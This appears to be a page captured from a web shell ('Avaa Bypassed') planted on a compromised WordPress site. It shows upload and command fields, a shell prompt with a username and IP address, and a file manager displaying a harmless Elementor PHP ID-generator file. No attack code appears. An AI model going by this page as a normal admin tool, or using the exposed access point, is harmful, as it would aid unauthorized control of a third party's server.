[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.145.63.42: ~ $
<?php

namespace Elementor\Modules\AtomicWidgets\Styles;

class Utils {
	public static function generate_id( string $prefix = '', $existing_ids = [] ): string {
		do {
			$id = $prefix . wp_rand( 1000000, 9999999 );
		} while ( in_array( $id, $existing_ids, true ) );

		return $id;
	}
}

Filemanager

Name Type Size Permission Actions
atomic-styles.php File 2.34 KB 0644
style-schema.php File 3.91 KB 0644
styles-renderer.php File 3.44 KB 0644
utils.php File 288 B 0644